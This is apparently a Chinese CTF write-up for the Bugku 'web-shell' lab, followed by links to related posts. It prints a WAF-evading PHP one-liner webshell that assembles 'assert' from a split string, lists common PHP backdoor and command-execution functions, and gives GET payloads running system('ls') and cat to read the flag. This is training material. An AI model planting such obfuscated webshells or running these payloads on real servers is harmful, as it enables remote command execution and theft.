bugku-web-shell

打开环境

什么都没有

提示:

送给大家一个过狗一句话

$poc="a#s#s#e#r#t";

poc_1=explode("#",poc);

poc_2=poc_1[0].poc_1\[1\].poc_1[2].poc_1\[3\].poc_1[4].poc_1\[5\]; poc_2($_GET['s'])

explode():把字符串打散为数组(php内置函数

$poc_2 = 'assert';

php特性:变量名 加 括号()=当函数来执行

$poc_2 = "assert";

$poc_2( 内容 ); → 等价于 assert( 内容 );

最常见的「后门函数」

PHP 里专门执行系统命令的函数

  • assert()
  • eval()
  • system()
  • exec()
  • shell_exec()
  • passthru()
  • include / require
  • system()
  • exec()
  • shell_exec()

url?s=system('ls')

如果是windows服务器要用dir

url?s=system('cat flaga15808abee46a1d5.txt')

相关推荐
unable code6 小时前
BUUCTF-[第二章 web进阶]SSRF Training
网络安全·web·ctf·1024程序员节
yv_306 小时前
CTF-IDA
学习·ctf
名字不相符2 天前
2026年3月27日NSSCTF之[SWPU 2019]漂流记的马里奥
学习·ctf·萌新
名字不相符2 天前
2026年3月27日NSSCTF之[SWPUCTF 2021 新生赛]ez_unserialize
学习·ctf·萌新
向往着的青绿色3 天前
备份是个好习惯 BugKuCTF题目题解
网络安全·php·安全威胁分析·ctf·安全架构·安全性测试·威胁分析
0vvv03 天前
bugku-web-source(git泄露
git·ctf
unable code4 天前
[网鼎杯 2020 玄武组]SSRFMe
网络安全·web·ctf·1024程序员节
谁把我灯关了4 天前
第十九届全国大学生信息安全竞赛半决赛 Web 题 easy_time 详细题解:Cookie 伪造 + Zip Slip + SSRF 拿 Flag
网络安全·ctf·wp·awdp·长城杯·第十九届全国大学生信息安全竞赛·第三届“长城杯”网数智安全大赛
山川绿水5 天前
Buuctf——[GYCTF2020]Ezsqli
web安全·网络安全·ctf